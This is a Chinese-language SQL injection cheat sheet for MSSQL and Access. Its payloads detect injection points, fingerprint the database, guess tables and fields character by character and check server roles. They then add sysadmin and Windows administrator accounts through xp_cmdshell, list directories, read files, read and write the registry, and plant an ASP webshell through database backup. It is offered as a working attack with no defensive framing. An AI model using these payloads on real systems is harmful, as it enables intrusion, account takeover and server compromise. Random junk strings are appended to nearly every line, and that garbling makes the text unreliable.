1.判断是否有注入;and 1=1 ;and 1=2 D9M:^
2.初步判断是否是mssql ;and user>0 +SwR+H)?
pR~U`r5z
3.注入参数是字符'and [查询条件] and ''=' 8<Hf"M
5LOo8xN
4.搜索时没过滤参数的'and [查询条件] and '%25'=' _4g.j
eUg~)m5G
5.判断数据库系统 e=.]F*:J
-Z's@'*
;and (select count(*) from sysobjects)>0 mssql
VNY%R,6
D*lKn62
;and (select count(*) from msysobjects)>0 access K5lmVF\$P
jYKor7KTqT
fk&8]tK4
^pUHKXihD
6.猜数据库 ;and (select Count(*) from [数据库名])>0 '3g[]M@M
"s{5O>
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 WYr/oRO
BqT y~{)+
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 r(P(Rj2~
lv04g} W
9.(1)猜字段的ascii值(access) @Z12CrJ
P
Y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 t2)rUWg
M]J^N#
(2)猜字段的ascii值(mssql) ')$+G152
4qk9NK2 U
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 9gmW&{6q
%
yw?s0
10.测试权限结构(mssql) a24"yT
o7$'cn
!4X
f~P
I"ok&^t^}
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }|pwz
R#I0|;q4|p
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 1]p ZrBh"E
ZusEfh?
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- P(f0R8BE
NGbG4-w-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- H5Io{B%=
e7sp =I,
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- <P=twT;P
qHrc9fB
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +8Rg F
VcXq?f>\
;and 1=(select IS_MEMBER('db_owner'));-- ()6wvu}
32`{7a3!=
V)[@98T_4?
j3{D^|0bP
11.添加mssql和系统的帐户 yjF1}SQ
7Mg=b%IYs
;exec master.dbo.sp_addlogin username;-- $adbCY\
;exec master.dbo.sp_password null,username,password;-- 6V7B;tB
%yv<y+yP~
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- :qd`zG3
JPoN&BTCj
;exec master.dbo.xp_cmdshell 'net user username password ~=uWD&5B4
T9Nb`sbV]
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K/|Z$4S
A\HxDIU
;exec master.dbo.xp_cmdshell 'net user username password /add';-- `ojoOB^L
mjW8Q\D
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- aWR}R>E
7+\+DujE$
=4FXBPoQK
;wz^gdh;
12.(1)遍历目录 Utnr5^].2O
WE: 24b6
;create table dirs(paths varchar(100), id int) d?A
0MKnl
|#]@Z)xa
;insert dirs exec master.dbo.xp_dirtree 'c:\' X:vghOt?
lPw%ErG
;and (select top 1 paths from dirs)>0 u>2
l7PA|
qVH1}9_
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) .\)U@L~
&m-PC(W+
[OC5l>
E2R&[Q"%
(2)遍历目录 X\{LnZ@r4
< t,zaIi
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- /`wvxKX
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 PHZ0P7
@~^5l
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 TFlet"ge=
j+$rj
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 wl#@lOv-P
(|klSz_4LM
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 9\_eK,*B
8%A#`)fb
'>-gi}z7
I ?gSG*m
13.mssql中的存储过程 (nf~x
nn@-W]
xp_regenumvalues 注册表根键, 子键 "_-Po^u=r
%A1o.{H
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 oX30VfT
5z7U1:
xp_regread 根键,子键,键值名 \LR~r%(rM
&"&Z
#llb
;exec xp_regread QdF5Cwf4
>=:&D)m"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ILEz;D{]
VVac:
xp_regwrite 根键,子键, 值名, 值类型, 值 WW4vn|0v
v%+:/m1
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 hT`J1nNt
O}-jCW;K
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 zzTfYf)
&Sw%<N*r
xp_regdeletevalue 根键,子键,值名 u0|8Tgf
IzikDc10
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 )dbB=OZ
mF*2#]%dx
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 hYPl&^
oM2l-[-
Wh+{mvu#
r`W)0oxD
14.mssql的backup创建webshell EofymAi%
>,gg5<F-E
use model >s>1[W @*
52:HNA\E/
create table cmd(str image); :61Tun
v1o#1;
insert into cmd(str) values (''); 3er nTD*`
HHDl8lo
backup database model to disk='c:\l.asp'; q rJ`1
{XR6>]
x+Ttl4
-]/I73!b
15.mssql内置函数 #lmB
AL~3
t<#mP@Mz=N
;and (select @@version)>0 获得Windows的版本号 ^Cu\VV
Aw$x;3y
;and user_name()='dbo' 判断当前系统的连接用户是不是sa zi|+HM
j9eTCJqB
;and (select user_name())>0 爆当前系统的连接用户 -+(jq>t
K28+]qy[
;and (select db_name())>0 得到当前连接的数据库 ALrw\qV
qLn/2
+T|JK7
[ey:e6,T9
16.简洁的webshell ZZ2vvtlyG
^U
`[(kz=
use model Ixb=L(V
2|3)S`WZl
create table cmd(str image); RQ vft
i6dHrx]:,
insert into cmd(str) values (''); LJd5;so-
diJLZikk
backup database model to disk='g:\wwwtest\l.asp';